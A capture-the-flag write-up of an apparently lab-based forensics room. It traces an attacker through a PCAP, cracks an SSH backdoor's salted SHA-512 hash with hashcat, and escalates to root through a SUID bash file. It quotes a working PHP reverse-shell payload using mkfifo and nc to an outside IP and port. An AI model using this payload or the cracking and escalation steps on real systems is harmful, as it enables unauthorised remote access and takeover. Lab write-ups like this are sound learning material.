What payload did the attacker use to gain access?
<?php exec(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f”)?>
What password did the attacker use to privesc?
How did the attacker establish persistence?
Using the fasttrack wordlist, how many of the system passwords were crackable?
What’s the default hash for the backdoor?
(MAKE SURE YOU CLONE THE GITHUB REPOSITORY OF SSH BACKDOOR FIRST and then open the main.go file)
What’s the hardcoded salt for the backdoor?
What was the hash that the attacker used? — go back to the PCAP for this!
Crack the hash using rockyou and a cracking tool of your choice. What’s the password?
If you go to the main.go file and read the hashpassword function, you will find that it has a sha512 password + salt
Simply using john or crackstation wont help.Therefore we try to look for the format (sha514 password+hash) on hashcat using the command
hashcat -help to see all usage and we find this in number 1710 which has the format sha512($pass.$salt) so we use it
Basically This is the command we use:
hashcat -m 1710 -a 0 -o outputfile.txt hashfile.txt passwordlist.txt
The hashfile which in my case is heshh.txt must contain
password hash:hardcoded salt
(If you are confused, look at the answers above)
Once its done, we got out cracked password in crackpass.txt and the password is november16
The attacker defaced the website. What message did they leave as a heading?
H4ck3d by CooctusClan
Now this part was a bit confusing i tried to run the ./backdoor command(as left by attacker in the pcap file) but i was unable to get in.
After nmap scan i saw that port 22 and 2222 were open and using ssh.I tried connecting to 22 using both the password november16 and whenevernoteartinstant but was not able to get in.
However if you connect to ssh on port 2222 using the -p option to specify port, we can get it in.
The user flag can be found in /home/james directory
I tried looking around in /var/www/html which often contains juicy information and configuration files and i found this in index.html however this info was not useful.
We run sudo -l to see all command we can execute however it asks for password so lets move on…
Now Run ls -la to see all files and we immediately see a executable bash file in red named .suid_bash which is owned by root.You can also try running linpeas or running the find command as i did to find SUID files
We can also go to GTFO bins website and search “bash” and click on the SUID option since we have a bash SUID file
and we immediately see a command ./bash -p
Basically if you run the bash file with -p option, the -p option will run it with the privileges of the Effective User Id (root)
Run the command ./.suid_bash -p
and it will spawn a bash shell… now change directory to root and view the root flag……. cd /root and then, cat root.txt
This was a pretty fun room and different from the general ones and i hope you learned from this writeup-ZEUS